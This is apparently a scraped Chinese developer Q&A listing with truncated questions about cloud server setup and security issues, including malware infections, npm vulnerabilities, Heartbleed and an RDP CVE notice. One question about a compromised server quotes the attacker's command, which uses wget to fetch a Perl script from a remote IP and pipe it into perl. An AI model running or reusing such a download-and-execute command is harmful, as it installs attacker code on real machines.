1回答
使用云应用程序和本地私有数据库
、、、、
我们正在开发一个使用java的云ERP产品,并希望为用户提供一个选择,以使用本地数据库文件或云上的数据库。对于我们的一些客户来说,他们的数据非常敏感,他们不希望他们的数据存储在web服务器上,而是希望将数据库存储在他们自己的服务器/pc上。
这种产品在技术上是可行的,安全的,有效的实现和维护吗?如果是这样的话,有没有人可以推荐这种架构的最佳解决方案,在这种架构中,我们云服务器上的应用程序可以与本地数据库无缝地工作?
非常感谢
LJ
浏览 1提问于2013-11-06得票数 1
1回答
我们最近提供的几台云服务器似乎默认忽略了信号。我可以找出是什么导致了这种行为,它影响到依赖捕获信号的ctrl+c和bash脚本。
这可以使用set命令来演示,将在此环境中工作的服务器(几年前设置)与受影响的服务器进行对比。
me@working.server ~ $ sleep 300 &
[1] 9554
me@working.server ~ $ cat /proc/9554/status
Name: sleep
Umask: 0002
State: S (sleeping)
Tgid: 9554
...
SigQ: 0/63430
SigPnd: 0000000
浏览 0提问于2019-03-25得票数 1
1回答
运行在服务器上显示病毒警告的网站
、、、、
我在Ubuntu8.04LTS上运行Plesk9.5,大约有15个网站被一些恶意代码附加到java文件的末尾。我已经安装了Clamav,它成功地收集了受感染的文件,这些文件的模式为/kmae9gr6m/或/gootkitstart/,以/qhk6sa6g1c/或/gootkitend/结束。
我的Plesk面板是最新的,并安装了安全修补程序。如何隔离服务器上的安全漏洞?
浏览 0提问于2012-06-25得票数 0
回答已采纳
我最近购买了一台云服务器用于备份。此服务器配置了公共IP地址,并在其上安装了Windows 2016。
另一方面,我在防火墙和局域网后面有一个Windows 2008。
我的目的是在远程服务器(云服务器)上创建一个映射驱动器,并按组策略(来自windows server 2008)部署它,以便用户能够将文件备份到自己的云目录中。
我已经在云服务器上安装并成功地配置了路由和远程访问角色,我在局域网上的一台机器上测试了从拨号连接到它的测试。这很好用。现在我需要的是映射这个文件夹使用局域网上的组策略从windows服务器2008,以便驱动器显示,而他们不需要连接到拨号连接之前登录。这有可能吗?
预先
浏览 0提问于2017-05-11得票数 0
一个恶意的电子邮件附件会污染我的云电子邮件帐户中的所有附件吗?Gmail或Microsoft中提供了各种预览功能,可以有效地解释服务器上的图像或PDF之类的附件。一定有保护措施,对吧?
浏览 0提问于2022-01-11得票数 0
回答已采纳
如何确保我的PHP版本被更新以阻止Mayhem恶意软件?
更新我的Ubuntu服务器上的PHP会阻止Mayhem恶意软件将其放到服务器上,阻止它运行,或者其他什么吗?
我还能做些什么来防止它吗?
编辑:这是我发现的最具信息性的文章,描述了混乱:https://www.virusbtn.com/virusbulletin/archive/2014/07/vb201407-Mayhem
浏览 0提问于2014-07-21得票数 2
回答已采纳
1回答
我知道在GitHub上推进我的前端代码是绝对安全的。但我关心的是我的后端代码。我想向未来的招聘人员展示我的服务器端编码技能。但是,如果我的后端代码中有一个严重漏洞,并且有人读取了我的代码并利用了该漏洞,该怎么办?基本上,我想说的是,我可以把我的正常项目的后端源代码推到GitHub上,但托管在云上的生产网站的后端代码值得吗?利用它可以让我花很多钱,同时也会失去应用程序的用户吗?
浏览 3提问于2021-01-27得票数 0
1回答
我有一个SQL 2000数据库服务器,它不再受Microsoft的支持。我们已经应用了我们的信息安全策略,甚至PCI需求。在这种情况下,我们可能面临哪些安全风险?
我可以想到一个例子:漏洞。如果在服务器上发现新发现的漏洞,我们能修复吗?通常它们是通过新的补丁或更新来修复的,但在这种情况下,我认为微软不会提供任何补丁或更新。
浏览 0提问于2013-11-25得票数 1
1回答
预到云漏洞扫描
、、、、
我们有漏洞扫描软件在共享子网,我们的网上网络.我们现在正在添加托管在公共云上的VM,需要对它们执行漏洞扫描。一种选择是打开从open到公共云的单向流量,这样扫描仪就可以到达所有VM。因此,所有端口都将向VM开放(在一个方向)。这是可取的吗?在子网中运行vul扫描软件不更好吗?这样就不需要在on和cloud之间允许任何流量了吗?例如,运行在VM相同子网中的扫描仪可以将结果推送到dmz中的中央扫描器服务器。公司如何适应公共云解决这一问题?
浏览 3提问于2021-11-19得票数 0
回答已采纳
2回答
对于我的项目,我使用了一个包,Seriate。
npm install seriate
但是,运行它会得到以下结果:
发现17个漏洞(9个低、1个中等、7个高)
我运行了npm audit和npm audit fix,但什么也没有。我还研究了依赖项,Lodash似乎有一个安全问题(据推测固定在4.17.11)。
我怎么才能修好这些?我已经尝试过像这样更新npm install lodash@4.17.11:然而,这也不起作用。
另外,这是否需要担心,它是从本地服务器上运行的,而本地服务器本身是安全的?
谢谢你的帮助
浏览 2提问于2019-07-03得票数 4
回答已采纳
1回答
【腾讯云】您好,腾讯云安全中心检测到您(账号ID:4093932,昵称:独自挥霍这斑驳了的青春)的主机存在远程桌面服务高危漏洞(CVE-2019-0708)尚未修复,目前已有漏洞利用工具传播,被利用可导致感染蠕虫或勒索病毒危害业务,风险极大。请您尽快在2019年9月26日10:00前完成漏洞修复,逾期未修复我们将采取禁止受影响端口(3389)的远程连接来保障安全,您可以通过控制台VNC登录机器修复并自助解封,详情请查看站内信
浏览 630提问于2019-09-25
2回答
不利用漏洞进行漏洞测试?
、、、
我在一台服务器上做了一些测试,看看它是否容易受到0天的本地攻击(该漏洞是为了使用Linux内核中的一个bug获得根权限)。除了运行该漏洞之外,还没有关于如何知道您是否易受攻击的真正信息。我这样做了,最后从数据中心那里得到了一大堆麻烦。在这种情况下,检查您的易受伤害性的最好方法是什么?人们是否可以假设,在他们被利用漏洞攻击之前,已经发布了一个修补程序(即使是在一个较硬的服务器上)?
浏览 0提问于2013-05-16得票数 5
回答已采纳
当我通过putty分析云服务器上的PCAP恶意软件文件时,我的本地PC是否有可能被感染?我想在我的云服务器上运行来测试snort。我想知道这样做是否会影响我的本地机器。
浏览 0提问于2020-08-26得票数 0
我在c#中开发了一个小脚本来压缩服务器中的旧日志文件,不幸的是服务器没有.net 4.5,我尝试在服务器上安装.net 4.5,但它要求在安装前重新启动,不鼓励安装和重新启动服务器,因为它是一个活动的生产服务器,负载很重,因此需要批准,请帮助我如何在.net 4.0上实现由4.0提供的相同功能
浏览 20提问于2017-01-16得票数 0
回答已采纳
2回答
开放港口的脆弱性
、、
我正在云机器上安装服务,我想知道客户的端口漏洞。
我的服务位于服务器A(通常在客户站点上),需要通过端口1234访问服务器B(生活在云中)。在服务器B上,有一个服务运行在端口1234上,但是客户通常希望阻止对它的访问,将其作为非标准端口。服务器A没有运行在该端口上的服务,但仍然需要能够在该端口上进行通信。
是否存在打开端口的漏洞,该端口用于与另一个服务建立连接?如果你扫描一台机器A,端口就会打开,但上面什么也没有。
典型的解决方案是在IP A和IP B之间启用端口1234,但是在云中,我们不能保证IP地址。
浏览 0提问于2013-05-12得票数 0
2回答
在我们的项目中,我们有近200个春季启动微服务。我们正在修复这些微服务的开源漏洞。我们的微服务是基于spring引导的,目前可用的版本是2.3.X。
在对spring引导版本进行升级时,是否有需要选择spring引导版本的指导原则?目前,当我检查spring父程序的mvn存储库时,可用的最新版本是3.0。我可以直接更新到最新版本吗?或者在选择最新版本时是否需要考虑任何参数?
在我们的项目中,我们也有spring云依赖项,我检查了spring站点(),并能够获得与spring版本兼容的Spring云版本。我只能在春天的云上买到这个。是否有任何网站可以提供其他罐子的兼容性细节,如弹簧核心等
浏览 13提问于2022-11-30得票数 1
详细的错误日志如下
查找位置id查询错误:操作无法完成。Places服务器返回了我们无法理解的响应。如果您认为此错误代表错误,请使用我们的社区和支持页面()上的说明提交报告。错误:操作无法完成。Places服务器返回了我们无法理解的响应。如果您认为此错误代表错误,请使用我们的社区和支持页面()上的说明提交报告。
浏览 0提问于2017-08-24得票数 0
回答已采纳
我知道CloudFlare可以保护您的应用程序免受SQL和XSS注入等攻击。但是操作系统和web服务器呢?
例如,如果我的网站托管在IIS/Windows上,CloudFlare是否也可以保护我的服务器免受操作系统漏洞和/或IIS漏洞的攻击?
浏览 2提问于2015-12-29得票数 0
我们有RHELv6.9服务器,并在其上安装了OpenSSH v5.3p1 (由输出openssh-5.3p1-123.el6_9.x86_64的rpm -q openssh确认)。经过安全测试后,我们被要求将OpenSSH升级到v7.3,以避免任何漏洞。
我试过yum update openssh,上面写着
No Packages marked for Update
知道吗,我怎么才能更新openssh?是否有可能在RHEL 6.9上将其更新到7.3?
浏览 0提问于2017-10-30得票数 6
回答已采纳
我的主机多个wordpress站点都遇到了安全问题。所有的网站都有不同的主题,在不同的服务器上,在不同的用户内部隔离。他们已经竞选了几个月,没有任何问题。然而,上周,他们中的一些人受到以下因素的影响:
将流量重定向到显示文件系统中奇怪/损坏文件的垃圾邮件,包括添加到.php文件(编码头)中的额外文件和内容--我们的云提供商发出了滥用警报:一家大银行联系了他们,称我们的IP地址被用来进行钓鱼攻击。服务器在PHP进程(非常高的负载、CPU和内存使用)方面运行得很高。
对此,我有:
一个月前,FilesChecked 从备份中复制了SQL和Wordpress文件,用官方的Wordpress 替换了整
浏览 6提问于2020-04-20得票数 0
我们自己托管的GitLab服务器正在随机崩溃,我们不知道原因。这种随机行为会影响我们的部署,它会变得太慢。重新启动后,熬夜几个小时并下降,抛出500或502错误。回到原处后,我看到与其他服务相比,总括grafana仪表板上的sidekiq或gitaly指标都下降了。这些服务是做什么的?如何调试这个问题?
系统信息:
OS - Centos 6.10 (最终)
CPU -8核
内存使用- 8.82 GB / 15.6 GB
磁盘使用-
根: 111 GB / 389 GB
引导: 169 MB / 476 MB
/mnt/resource :8.25GB/ 62.9
浏览 16提问于2022-03-14得票数 -2
回答已采纳
1回答
我正在制作一个带有node express后端的网站,它从公共目录中提供react应用程序。我的电脑运行得很好,我把所有这些都放到了AWS服务器上,为我的服务器运行了npm install,为我的应用程序在公共目录中运行了npm install,这就是我得到消息的地方:
/public$ npm audit fix
up to date, audited 1960 packages in 5s
# npm audit report
public *
Severity: high
Cross-Site Scripting - https://npmjs.com/advisories/10
浏览 6提问于2021-01-08得票数 1
1回答
我是exchange服务器和powershell的初学者,我正在开发Exchange服务器(在前提下),如何确定我是否有最新的更新、安全更新、windows服务器(核心)和exchange服务器的版本,所以我必须更新它?( powershell)。
提前感谢
浏览 0提问于2021-09-19得票数 -3
回答已采纳
这是Exchange2016 CU8在windows 2016标准上的新安装。
司机信件:
C: OS
D: Exchange 2016 CU8 ISO (挂载)
在Exchange2016 CU8安装之后,已被卸载,我为其设置了一个新的数据驱动器。数据驱动器采用驱动字母D:默认情况下。当我重新启动服务器时,会创建D:\AdvancedDataGovernanceLogs文件夹。
如果我将数据驱动器字母从D:更改为E:驱动器,则在服务器重新启动时不会创建D:\AdvancedDataGovernanceLogs文件夹。
什么是AdvancedDataGovernanceLogs文件夹,您如何更
浏览 0提问于2018-01-24得票数 1
我们有一系列运行JBoss的云服务器,作为6.1.0社区版。我们使用SSL限制对这些系统的访问。我们为每个服务器生成一个SSL证书,然后手动将其分发给需要访问的人员。服务器是它自己的证书颁发机构。证书不是用于向用户标识服务器,而是用于标识服务器的用户。
无论如何,重点是: JBoss作为6.1.0是否容易受到心脏出血的影响?我们使用openssl生成密钥,但据我所知,JBoss使用Tomcat/Coyote来完成https的操作。他们使用OpenSSL库吗?如果JBoss是一个问题,我如何具体地修补它的组件?不幸的是,升级JBoss版本不是一种选择。
浏览 0提问于2014-04-09得票数 1
回答已采纳
在哪里或者怎样才能找到一个没有补丁的操作系统的安全漏洞列表呢?我想确定我可以告诉服务器所有者在过时的操作系统上的实际风险。我可以得到所有CVEs的列表,但是我无法筛选补丁状态。
浏览 0提问于2016-06-30得票数 3
回答已采纳
我有一个非常奇怪的问题。我在windows azure云上使用Elasticsearch和Couchbase。我在一台ubuntu机器(3.5 gb)上配置了couchbase和elasticsearch。我已经把elasticsearch放在自动索引上了。我有一个java应用程序,可以与couchbase和elasticsearch对话。
这里的问题是,我看到从服务器上传出的大量数据在一天内达到500 GB,这让我付出了高昂的代价,比如每天80美元。我也试过将这个东西重新部署到其他盒子上,但结果是一样的。
我还尝试将elasticsearch和couchbase放在不同的服务器上,但输出的数
浏览 0提问于2014-11-24得票数 0
2回答
假设一个在PaaS公共云环境中开发的应用程序。应用程序存储和处理某种敏感数据。
加密技术似乎已经被清晰地描述了,以及管理云外密钥的选项,它可以帮助确保组织之外的任何人在存储在云中时都不能访问您未加密的数据。
在传输过程中的加密似乎已经被清晰地描述了。例如,表示级的TLS加密意味着在传输过程中,在OSI模型的较低级别上无法读取未加密的数据。
这就给我们留下了正在使用的数据。云提供商在这方面越来越模糊,在这方面似乎存在很多误解。时间数据在逻辑上存储在RAM中,并由例如一个应用程序处理,据我所知,它不是加密的。这是云加密的一部分,我不完全理解如何解释,我需要你的帮助。
在这一点上,理论上谁能访问清楚
浏览 0提问于2022-06-14得票数 0
回答已采纳
1回答
在过去的几周里,我一直注意到我们服务器上的CPU负载非常高,在检查htop时,有许多同步_超人进程以100%的速度运行。今天,我很快就捕捉到了原来的命令调用仍然在htop中,下面的图像显示了运行脚本的调用以及由此产生的同步_超人进程。
📷
阅读我可以看到的行,它使用base64编码的字符串隐藏了它正在调用的内容,如下所示:
wget -qO - http://185.234.218.248/bt2.txt|perl
它正在下载的文件是一个perl脚本,它连接到一个irc服务器上,但是我快速地看了一下(我不知道perl),我不知道它除了敲我的CPU之外还做什么,尽管我假设它是比特币农作之类的。我
浏览 0提问于2019-03-06得票数 3
我只有一个云服务器来托管一个网站(django + gunicorn + nginx),postgres数据库将部署到另一个云服务器上。
在这种情况下,我应该为我的网站创建特殊的用户吗?它似乎更容易使用根,它会带来更多的安全风险,但如果我只托管一个应用程序呢?
浏览 0提问于2018-08-18得票数 1
我正在检查迁移到Windows Azure云托管的可能性,网站的URL中使用了阿拉伯(非拉丁)字符。
网站上的原始url是:
在托管相同页面的相同URL的azure上是:
在APACHE服务器上运行的第一个url上,url请求运行正常。
而在Azure上,阿拉伯字符被忽略,导致请求成为索引页
关于如何在Azure的url中允许阿拉伯字符,有什么想法吗?
浏览 0提问于2012-12-12得票数 1
回答已采纳
我在CentOS内核2.6.32-358.6.1.el6.x86_64上运行Linux 6.5
我从我的vserver主机那里得到了一个警告,我需要升级到Linux kernel > 3.15-rc5,因为有一个安全漏洞会允许我的服务器被接管。
我做了一个yumupgrade,但它不会将内核升级到高于2.6.32-358.6.1.el6.x86_64的版本。
目前,我对如何继续下去感到困惑。
有人能告诉我这是怎么回事吗?如果是我,他会怎么做?谢谢!
浏览 23提问于2014-07-27得票数 2
当CentOS 6.3可用时,我对为什么我的新服务器安装了CentOS 5.9感到困惑。
但事实证明,CentOS 5.9实际上是最新发布的。
为什么5.x版本发布时,他们是一个死胡同,将失去充分的支持,从现在起不到一年?
是否有任何理由在新服务器上而不是6.x上安装CentOS 5.9?有什么理由避免6.x吗?我以为6> 5。
浏览 0提问于2013-02-26得票数 3
回答已采纳
1回答
我的公司销售一个应用订阅,它作为SAAS托管在Amazon上。我有几个客户并不热衷于将他们的文档上传到我的产品中,因为我的产品是托管在公共云上的。为什么这种普遍的不信任与云有关?
即使是一个外行查找谷歌,也会发现如此之多的白皮书和博客,比如这,他们谈论亚马逊服务、网络和基础设施的安全性。即使您在自己的服务器上托管任何东西,也很难获得这种安全性(除非您是一家盈利百万美元的公司!)
当大公司所谓的“安全专家”提出这些疑问时,我想知道我是不是遗漏了什么。如果您有服务器的物理安全性、保护您免受DDos、Ip欺骗性等攻击的网络安全,以及其他各种各样的安全措施,如磁盘加密、实例隔离、SSL等等,那么为什么
浏览 0提问于2015-11-26得票数 0
回答已采纳
我正在分析CVE-2022-0839。
在检查承诺时,我不明白为什么提交在测试类上。我的意思是,测试类如何修复易受攻击的组件?修正不应该在有罪的课堂上进行吗?
浏览 0提问于2022-07-21得票数 0
背景:
使用上面类似的内容,您可以看到Facebook为我所要完成的过程提供的文档。
也就是说,我有已经成功验证并链接到Facebook用户帐户的服务器API,并且在我们的服务器上有一个长期令牌。使用长期令牌(通过服务器端),我试图生成一个“客户端代码”(如Facebook所称),以便发送到我们的iOS客户端应用程序。然后,客户端应用程序可以用来创建一个长期令牌,以便在本地使用SDK。
采取的步骤:
文档说明需要传递三个值: access_token、client_secret、redirect_uri (client_secret是应用程序的秘密)。这已经是错误的,因为仅当传递这些值时
浏览 3提问于2013-08-26得票数 1
回答已采纳
在从hbase集群中删除几个节点时,我们过早地退出了hadoop (在退役之前)。当我们运行hdfs fsck时,我们意识到有几个缺块。我们立即将删除的节点添加回集群。fsck仍然报告说有一些块丢失了。
同时,HBase无法从这些区域找到这些丢失的块。最好的解决办法是什么?我们知道HBase无法找到的HDFS文件的位置。
更新:
更正- namenode只拥有丢失块的元数据。真正的街区不见了。现在我们如何修复HBase以从区域服务器中删除这些数据块?
浏览 2提问于2012-07-19得票数 0
回答已采纳
假设攻击者无法访问您的LAN\路由器等.他们如何通过闪存漏洞来控制您的网络摄像机\系统外围设备\其他资源。这就是我在新闻中听到的,我想让大家熟悉使用的方法。
如果web服务器\网站管理员想要攻击您,我可能会看到它正在发生,因为他会有您的ip地址和其他标识信息,我想从那里开始吧。但是,一个无法访问user服务器的攻击者如何对该站点的用户发起横向攻击呢?那么flash的脆弱性是如何被利用起来的呢?
奖励:最后,奖金问题,我听说我们必须使用nmap这样的嗅探器来扫描网络上主机上的特定端口\服务上的漏洞。我想这些秃鹫以前是被发现的,并被记录在网上的一些数据库中。但我的问题是:一旦我们有了目标计算机,像
浏览 0提问于2015-10-19得票数 2
3回答
我是服务器管理员的新手,但我正试图把我的头放在Apache服务器上。当我试图跟踪Apache错误日志时,我感到很震惊。即使在浏览日志之后--我只看到了实际的错误--每秒也会得到大约一个错误。Apache状态页面表示服务器每秒处理6.3个请求。
对我来说,这似乎是一个异常高的错误率,但我不知道大多数服务器是如何运行的。
我是不是在看一个急需帮助的服务器(正如我所怀疑的)?
或者这是正常的?
浏览 0提问于2009-05-27得票数 2
回答已采纳
我习惯于使用Meteor JavaScript框架开发web应用程序,该框架处理身份验证。我现在正在第一次开发一个web应用程序,它使用后端的Node.js (Express) + GraphQL堆栈,在前端使用React,所以我必须自己处理身份验证。
我读了很多关于它的内容,我喜欢基于令牌的身份验证的想法。我正在考虑使用JWT,所以我不必处理会话。
我知道有很多教程,但每个教程都有一种免责声明:“本教程还没有准备好生产,只用于教育目的.”。每次我读到有关身份验证的东西时,似乎都是很难实现的,所以我不应该自己实现它。但是我不想使用像AWS科尼托这样的服务提供商,谷歌云平台,因为我想把我的用户数
浏览 0提问于2018-07-10得票数 3
回答已采纳
我开始创建一个小型的云平台来学习,并在以后扩展到真正的使用。我使用的是C#和WCF。我的想法是有一个服务器和执行器系统。服务器将包含用户提交给它的作业。执行器系统向服务器请求作业,并执行作业并将结果更新到服务器。该作业是一个具有方法execute()的C#类对象,该方法将由执行器调用。
我的问题是,如何将对象及其方法(行为)移交给Executor,以便Executor执行它。序列化对象时,只会发送数据。我想知道像这样的云框架是如何实现的。我对任何在远程系统上执行作业的C#技术都持开放态度,尽管我更喜欢WCF。
浏览 2提问于2012-07-27得票数 0
我有一个Nestjs应用程序,我试图在一个码头容器中运行它。直到最近我得到错误Parse Error: Missing expected CR after header value为止,一切都很好。我正在尝试向IoT设备的GET服务器发出http请求。此外,只有当我在码头容器内运行服务器应用程序时,才会发生此错误。当我在windows或macos机器上本地运行它时,一切都很好。
我尝试在docker中使用不同版本的nodejs。14,16和18。这个错误总是出现,独立于我使用的版本。我不知道如何调试这个错误,因为它只发生在我在一个码头容器内服务应用程序的时候。
这是我的文件:
FROM nod
浏览 11提问于2022-08-08得票数 1
回答已采纳
1回答
我需要帮助,了解如何管理我们的产品的安全发行说明。我们每半年都会发布我们的产品,每个月都会发布安全或维护版本。
关于我们告诉客户的安全问题,我应该考虑什么?
我们应该告诉他们我们升级了我们的第三方软件吗?,例如,我们应该告诉他们我们升级了Apache服务器版本吗?
我们应该列出Apache、中修复的漏洞,还是足够链接到Apache站点的漏洞?
我们应该管理带有版本的3D派对软件的列表吗?
我们的内部安全漏洞怎么办?应该列出固定安全漏洞的列表吗?这可能会危及那些不会升级到最新版本的客户。
我们应该如何公布安全漏洞呢?应该将我们的公司作为http://cve.mitre.org/数据库的供应商添加
浏览 0提问于2013-12-23得票数 6
回答已采纳
3回答
我的网站最近被黑客入侵,显然它是代码注入漏洞,而不是SQL注入。至少这是Google告诉我的,甚至给了我一个可能的iframe代码。这对我来说是个打击,因为我的网站从来没有发生过这种情况。我发现最近我正在我的webserver上测试upload php脚本,然后忘了删除它。所以我知道他们是怎么进来的。因此,我继续记录所有我看到的不属于服务器的东西,包括upload php脚本。另外,我在.htaccess文件中看到了一些有用的东西。我没有检查代码,而是从服务器上完全删除了它。
不管怎样,我试着尽我所能,就像人们在网上建议的那样。尽管如此,黑客并没有完全消失,也没有完全消失。所以,我认为够了就够
浏览 0提问于2012-07-30得票数 -1
回答已采纳
本来安装了wdcp,但是最近一朋友跟我说用宝塔更好,wdcp比较占用资源,然后宝塔不能安装云锁,好像不兼容然后想安装宝塔又不想舍弃云锁,因为有些云锁貌似不错,问下腾讯云主机有没有自带的这个防御[图片]第一就是漏洞的防注入[图片]还有这个CC防御不知道腾讯云主机有没有自带的这些等等
浏览 735提问于2017-04-04
当我在云站点(同一位置)上使用来自云服务器的iPad映像时,它在Chrome中工作得很好
但是在Safari中,图404的
如果我导航到Safari中的图像URL,就会得到以下信息
Chrome在同一条道路上也很好。
浏览 3提问于2020-12-14得票数 0
1回答
我们是一个小型的早期创业公司,没有那么多的钱可花。
我们有不到3台服务器,我们希望监控安全问题。
我们的网站本质上是在一个服务器上,具有:
Ubuntu
单页应用程序(完整的javascript)
带有MongoDB和ElasticSearch的API (Play/Scala/Netty)和Apache反向代理
如您所知,我更感兴趣的是服务器监视,而不是应用程序监视(不是真正寻找SQL注入、XSS或其他类似的东西,我想没有任何工具能够在JS应用程序+ API堆栈上自动测试)
是否有任何可用的开放源码产品来监视这些事情并提醒我们安全问题?
我们正在寻找一个免费或廉价的工具,易于使用。更可取的是廉
浏览 0提问于2014-10-22得票数 -1
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
腾讯会议
实时音视频活动推荐
腾讯云开发者
